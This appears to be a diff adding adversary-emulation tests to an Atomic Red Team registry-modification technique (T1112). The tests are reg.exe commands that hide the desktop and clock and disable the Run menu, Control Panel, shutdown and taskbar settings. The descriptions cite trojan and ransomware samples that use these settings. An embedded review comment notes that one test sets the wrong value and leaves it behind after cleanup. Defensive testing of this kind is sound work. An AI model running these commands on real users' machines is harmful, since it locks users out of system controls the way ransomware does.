@@ -31917,6 +31917,268 @@ defense-evasion: cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /f >nul 2>&1 +' + name: command_prompt + elevation_required: true + - name: Activate Windows NoDesktop Group Policy Feature + auto_generated_guid: 93386d41-525c-4a1b-8235-134a628dee17 + description: "Modify the registry of the currently logged in user using reg.exe + via cmd console to hide all icons on Desktop Group Policy. \nTake note that + some Group Policy changes might require a restart to take effect.\nSee how + Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis\n" + supported_platforms: + - windows + executor: + command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" + /v NoDesktop /t REG_DWORD /d 1 /f + +' + cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" + /v NoDesktop /f >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: Activate Windows NoRun Group Policy Feature + auto_generated_guid: d49ff3cc-8168-4123-b5b3-f057d9abbd55 + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Run menu from Start Menu Group Policy. + Take note that some Group Policy changes might require a restart to take effect. 
+ See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis + supported_platforms: + - windows + executor: + command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" + /v NoRun /t REG_DWORD /d 1 /f + +' + cleanup_command: "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" + /v NoRun /f \n" + name: command_prompt + elevation_required: true + - name: Activate Windows NoFind Group Policy Feature + auto_generated_guid: ffbb407e-7f1d-4c95-b22e-548169db1fbd + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Search menu from Start Menu Group Policy. + Take note that some Group Policy changes might require a restart to take effect. + See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis + supported_platforms: + - windows + executor: + command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" + /v NoFind /t REG_DWORD /d 1 /f + +' + cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" + /v NoFind /f >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: Activate Windows NoControlPanel Group Policy Feature + auto_generated_guid: a450e469-ba54-4de1-9deb-9023a6111690 + description: "Modify the registry of the currently logged in user using reg.exe + via cmd console to Disable Control Panel Group Policy. 
\nTake note that some + Group Policy changes might require a restart to take effect.\nSee how Trojan + abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis\n" + supported_platforms: + - windows + executor: + command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" + /v NoControlPanel /t REG_DWORD /d 1 /f + +' + cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" + /v NoControlPanel /f >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: Activate Windows NoFileMenu Group Policy Feature + auto_generated_guid: 5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4 + description: "Modify the registry of the currently logged in user using reg.exe + via cmd console to Remove File menu from Windows Explorer Group Policy. \nTake + note that some Group Policy changes might require a restart to take effect.\nSee + how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis\n" + supported_platforms: + - windows + executor: + command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" + /v NoFileMenu /t REG_DWORD /d 1 /f + +' + cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" + /v NoFileMenu /f >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: Activate Windows NoClose Group Policy Feature + auto_generated_guid: 12f50e15-dbc6-478b-a801-a746e8ba1723 + description: "Modify the registry of the currently logged in user using reg.exe + via cmd console to Disable and remove the Shut Down command Group Policy. 
+ \nTake note that some Group Policy changes might require a restart to take + effect.\nSee how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis\n" + supported_platforms: + - windows + executor: + command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" + /v NoClose /t REG_DWORD /d 1 /f + +' + cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" + /v NoClose /f >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: Activate Windows NoSetTaskbar Group Policy Feature + auto_generated_guid: d29b7faf-7355-4036-9ed3-719bd17951ed + description: "Modify the registry of the currently logged in user using reg.exe + via cmd console to Disable changes to Taskbar and Start Menu Settings Group + Policy. \nTake note that some Group Policy changes might require a restart + to take effect.\nSee how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n" + supported_platforms: + - windows + executor: + command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" + /v NoSetTaskbar /t REG_DWORD /d 1 /f + +' + cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" + /v NoSetTaskbar /f >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: Activate Windows NoTrayContextMenu Group Policy Feature + auto_generated_guid: 4d72d4b1-fa7b-4374-b423-0fe326da49d2 + description: "Modify the registry of the currently logged in user using reg.exe + via cmd console to Disable context menu for taskbar Group Policy. 
\nTake note + that some Group Policy changes might require a restart to take effect.\nSee + how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n" + supported_platforms: + - windows + executor: + command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" + /v StartMenuLogOff /t REG_DWORD /d 1 /f + +' + cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" + /v NoTrayContextMenu /f >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: Activate Windows NoPropertiesMyDocuments Group Policy Feature + auto_generated_guid: 20fc9daa-bd48-4325-9aff-81b967a84b1d + description: "Modify the registry of the currently logged in user using reg.exe + via cmd console to hide Properties from \"My Documents icon\" Group Policy. + \nTake note that some Group Policy changes might require a restart to take + effect.\nSee how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n" + supported_platforms: + - windows + executor: + command: "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" + /v NoPropertiesMyDocuments /t REG_DWORD /d 1 \n" + cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" + /v NoPropertiesMyDocuments /f >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: Hide Windows Clock Group Policy Feature + auto_generated_guid: 8023db1e-ad06-4966-934b-b6a0ae52689e + description: "Modify the registry of the currently logged in user using reg.exe + via cmd console to Hide Clock Group Policy. 
\nTake note that some Group Policy + changes might require a restart to take effect.\nSee how ransomware abuses + this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n" + supported_platforms: + - windows + executor: + command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" + /v HideClock /t REG_DWORD /d 1 /f + +' + cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" + /v HideClock /f >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: Windows HideSCAHealth Group Policy Feature + auto_generated_guid: a4637291-40b1-4a96-8c82-b28f1d73e54e + description: "Modify the registry of the currently logged in user using reg.exe + via cmd console to remove security and maintenance icon Group Policy. \nTake + note that some Group Policy changes might require a restart to take effect.\nSee + how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n" + supported_platforms: + - windows + executor: + command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" + /v HideSCAHealth /t REG_DWORD /d 1 /f + +' + cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" + /v HideSCAHealth /f >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: Windows HideSCANetwork Group Policy Feature + auto_generated_guid: 3e757ce7-eca0-411a-9583-1c33b8508d52 + description: "Modify the registry of the currently logged in user using reg.exe + via cmd console to remove the networking icon Group Policy. 
\nTake note that + some Group Policy changes might require a restart to take effect.\nSee how + ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n" + supported_platforms: + - windows + executor: + command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" + /v HideSCANetwork /t REG_DWORD /d 1 /f + +' + cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" + /v HideSCANetwork /f >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: Windows HideSCAPower Group Policy Feature + auto_generated_guid: 8d85a5d8-702f-436f-bc78-fcd9119496fc + description: "Modify the registry of the currently logged in user using reg.exe + via cmd console to remove the battery icon Group Policy. \nTake note that + some Group Policy changes might require a restart to take effect.\nSee how + ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n" + supported_platforms: + - windows + executor: + command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" + /v HideSCAPower /t REG_DWORD /d 1 /f + +' + cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" + /v HideSCAPower /f >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: Windows HideSCAVolume Group Policy Feature + auto_generated_guid: 7f037590-b4c6-4f13-b3cc-e424c5ab8ade + description: "Modify the registry of the currently logged in user using reg.exe + via cmd console to remove the volume icon Group Policy. 
\nTake note that some + Group Policy changes might require a restart to take effect..\nSee how ransomware + abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n" + supported_platforms: + - windows + executor: + command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" + /v HideSCAVolume /t REG_DWORD /d 1 /f + +' + cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" + /v HideSCAVolume /f >nul 2>&1 + ' name: command_prompt elevation_required: true diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md index 921e28c8..95ff2ab5 100644 --- a/atomics/T1112/T1112.md +++ b/atomics/T1112/T1112.md 
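Review bot: In the new `Activate Windows NoTrayContextMenu Group Policy Feature` test the `reg add` writes `/v StartMenuLogOff` while the name, description and `reg delete` all refer to `NoTrayContextMenu`, so the test never sets the value it claims to exercise and its cleanup deletes a value that was never created, leaving `StartMenuLogOff` set on the host after the run; the add line should read `/v NoTrayContextMenu /t REG_DWORD /d 1 /f`. In `Activate Windows NoPropertiesMyDocuments Group Policy Feature` the `reg add` carries no `/f`, so a re-run on a host where the value already exists makes reg.exe prompt for overwrite confirmation and stalls non-interactive execution; append `/f` as every sibling test does. Minor consistency points in the same hunk: the `NoRun` cleanup is the only one without `>nul 2>&1`, and the `HideSCAVolume` description ends with `effect..`. This file looks like a generated index, so the fix presumably belongs in the T1112 source definition, and the same values mirrored in atomics/T1112/T1112.md (Atomic Test #24 and #25) would then follow on regeneration.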
@@ -42,6 +42,34 @@ The Registry of a remote system may be modified to aid in execution of files as - [Atomic Test #16 - Disable Windows Lock Workstation Feature](#atomic-test-16---disable-windows-lock-workstation-feature) +- [Atomic Test #17 - Activate Windows NoDesktop Group Policy Feature](#atomic-test-17---activate-windows-nodesktop-group-policy-feature) + +- [Atomic Test #18 - Activate Windows NoRun Group Policy Feature](#atomic-test-18---activate-windows-norun-group-policy-feature) + +- [Atomic Test #19 - Activate Windows NoFind Group Policy Feature](#atomic-test-19---activate-windows-nofind-group-policy-feature) + +- [Atomic Test #20 - Activate Windows NoControlPanel Group Policy Feature](#atomic-test-20---activate-windows-nocontrolpanel-group-policy-feature) + +- [Atomic Test #21 - Activate Windows NoFileMenu Group Policy Feature](#atomic-test-21---activate-windows-nofilemenu-group-policy-feature) + +- [Atomic Test #22 - Activate Windows NoClose Group Policy Feature](#atomic-test-22---activate-windows-noclose-group-policy-feature) + +- [Atomic Test #23 - Activate Windows NoSetTaskbar Group Policy Feature](#atomic-test-23---activate-windows-nosettaskbar-group-policy-feature) + +- [Atomic Test #24 - Activate Windows NoTrayContextMenu Group Policy Feature](#atomic-test-24---activate-windows-notraycontextmenu-group-policy-feature) + +- [Atomic Test #25 - Activate Windows NoPropertiesMyDocuments Group Policy Feature](#atomic-test-25---activate-windows-nopropertiesmydocuments-group-policy-feature) + +- [Atomic Test #26 - Hide Windows Clock Group Policy Feature](#atomic-test-26---hide-windows-clock-group-policy-feature) + +- [Atomic Test #27 - Windows HideSCAHealth Group Policy Feature](#atomic-test-27---windows-hidescahealth-group-policy-feature) + +- [Atomic Test #28 - Windows HideSCANetwork Group Policy Feature](#atomic-test-28---windows-hidescanetwork-group-policy-feature) + +- [Atomic Test #29 - Windows HideSCAPower Group Policy 
Feature](#atomic-test-29---windows-hidescapower-group-policy-feature) + +- [Atomic Test #30 - Windows HideSCAVolume Group Policy Feature](#atomic-test-30---windows-hidescavolume-group-policy-feature) +
@@ -357,7 +385,7 @@ Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name Lo ## Atomic Test #9 - Disable Windows Registry Tool Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows registry tool to prevent user modifying registry entry. -See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry +See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry **Supported Platforms:** Windows @@ -390,7 +418,7 @@ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\ ## Atomic Test #10 - Disable Windows CMD application Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows CMD application. -See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry +See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry **Supported Platforms:** Windows 
@@ -423,7 +451,7 @@ reg delete "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v "Di ## Atomic Test #11 - Disable Windows Task Manager application Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows task manager application. -See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry +See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry **Supported Platforms:** Windows @@ -456,7 +484,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies ## Atomic Test #12 - Disable Windows Notification Center Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows notification center. -See how remcos rat abuse this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html +See how remcos rat abuses this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html **Supported Platforms:** Windows @@ -489,7 +517,7 @@ reg delete HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v Dis ## Atomic Test #13 - Disable Windows Shutdown Button Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button. -See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/ +See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/ **Supported Platforms:** Windows 
@@ -522,7 +550,7 @@ reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policie ## Atomic Test #14 - Disable Windows LogOff Button Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button. -See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2 +See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2 **Supported Platforms:** Windows @@ -557,7 +585,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies ## Atomic Test #15 - Disable Windows Change Password Feature Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows change password feature. -See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah +See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah **Supported Platforms:** Windows @@ -590,7 +618,7 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies ## Atomic Test #16 - Disable Windows Lock Workstation Feature Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows Lock workstation feature. -See how ransomware abuse this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/ +See how ransomware abuses this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/ **Supported Platforms:** Windows @@ -618,4 +646,480 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies +
+
+ +## Atomic Test #17 - Activate Windows NoDesktop Group Policy Feature +Modify the registry of the currently logged in user using reg.exe via cmd console to hide all icons on Desktop Group Policy. +Take note that some Group Policy changes might require a restart to take effect. +See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 93386d41-525c-4a1b-8235-134a628dee17 + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDesktop /t REG_DWORD /d 1 /f +``` + +#### Cleanup Commands: +```cmd +reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDesktop /f >nul 2>&1 +``` + + + + + +
+
+ +## Atomic Test #18 - Activate Windows NoRun Group Policy Feature +Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Run menu from Start Menu Group Policy. +Take note that some Group Policy changes might require a restart to take effect. +See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis + +**Supported Platforms:** Windows + + +**auto_generated_guid:** d49ff3cc-8168-4123-b5b3-f057d9abbd55 + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f +``` + +#### Cleanup Commands: +```cmd +reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /f +``` + + + + + +
+
+ +## Atomic Test #19 - Activate Windows NoFind Group Policy Feature +Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Search menu from Start Menu Group Policy. +Take note that some Group Policy changes might require a restart to take effect. +See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis + +**Supported Platforms:** Windows + + +**auto_generated_guid:** ffbb407e-7f1d-4c95-b22e-548169db1fbd + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f +``` + +#### Cleanup Commands: +```cmd +reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /f >nul 2>&1 +``` + + + + + +
+
+ +## Atomic Test #20 - Activate Windows NoControlPanel Group Policy Feature +Modify the registry of the currently logged in user using reg.exe via cmd console to Disable Control Panel Group Policy. +Take note that some Group Policy changes might require a restart to take effect. +See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis + +**Supported Platforms:** Windows + + +**auto_generated_guid:** a450e469-ba54-4de1-9deb-9023a6111690 + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f +``` + +#### Cleanup Commands: +```cmd +reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /f >nul 2>&1 +``` + + + + + +
+
+ +## Atomic Test #21 - Activate Windows NoFileMenu Group Policy Feature +Modify the registry of the currently logged in user using reg.exe via cmd console to Remove File menu from Windows Explorer Group Policy. +Take note that some Group Policy changes might require a restart to take effect. +See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4 + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /t REG_DWORD /d 1 /f +``` + +#### Cleanup Commands: +```cmd +reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /f >nul 2>&1 +``` + + + + + +
+
+ +## Atomic Test #22 - Activate Windows NoClose Group Policy Feature +Modify the registry of the currently logged in user using reg.exe via cmd console to Disable and remove the Shut Down command Group Policy. +Take note that some Group Policy changes might require a restart to take effect. +See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 12f50e15-dbc6-478b-a801-a746e8ba1723 + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f +``` + +#### Cleanup Commands: +```cmd +reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /f >nul 2>&1 +``` + + + + + +
+
+ +## Atomic Test #23 - Activate Windows NoSetTaskbar Group Policy Feature +Modify the registry of the currently logged in user using reg.exe via cmd console to Disable changes to Taskbar and Start Menu Settings Group Policy. +Take note that some Group Policy changes might require a restart to take effect. +See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details + +**Supported Platforms:** Windows + + +**auto_generated_guid:** d29b7faf-7355-4036-9ed3-719bd17951ed + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetTaskbar /t REG_DWORD /d 1 /f +``` + +#### Cleanup Commands: +```cmd +reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetTaskbar /f >nul 2>&1 +``` + + + + + +
+
+ +## Atomic Test #24 - Activate Windows NoTrayContextMenu Group Policy Feature +Modify the registry of the currently logged in user using reg.exe via cmd console to Disable context menu for taskbar Group Policy. +Take note that some Group Policy changes might require a restart to take effect. +See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 4d72d4b1-fa7b-4374-b423-0fe326da49d2 + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /t REG_DWORD /d 1 /f +``` + +#### Cleanup Commands: +```cmd +reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayContextMenu /f >nul 2>&1 +``` + + + + + +
+
+ +## Atomic Test #25 - Activate Windows NoPropertiesMyDocuments Group Policy Feature +Modify the registry of the currently logged in user using reg.exe via cmd console to hide Properties from "My Documents icon" Group Policy. +Take note that some Group Policy changes might require a restart to take effect. +See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 20fc9daa-bd48-4325-9aff-81b967a84b1d + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyDocuments /t REG_DWORD /d 1 +``` + +#### Cleanup Commands: +```cmd +reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyDocuments /f >nul 2>&1 +``` + + + + + +
+
+ +## Atomic Test #26 - Hide Windows Clock Group Policy Feature +Modify the registry of the currently logged in user using reg.exe via cmd console to Hide Clock Group Policy. +Take note that some Group Policy changes might require a restart to take effect. +See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 8023db1e-ad06-4966-934b-b6a0ae52689e + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideClock /t REG_DWORD /d 1 /f +``` + +#### Cleanup Commands: +```cmd +reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideClock /f >nul 2>&1 +``` + + + + + +
+
+ +## Atomic Test #27 - Windows HideSCAHealth Group Policy Feature +Modify the registry of the currently logged in user using reg.exe via cmd console to remove security and maintenance icon Group Policy. +Take note that some Group Policy changes might require a restart to take effect. +See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details + +**Supported Platforms:** Windows + + +**auto_generated_guid:** a4637291-40b1-4a96-8c82-b28f1d73e54e + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAHealth /t REG_DWORD /d 1 /f +``` + +#### Cleanup Commands: +```cmd +reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAHealth /f >nul 2>&1 +``` + + + + + +
+
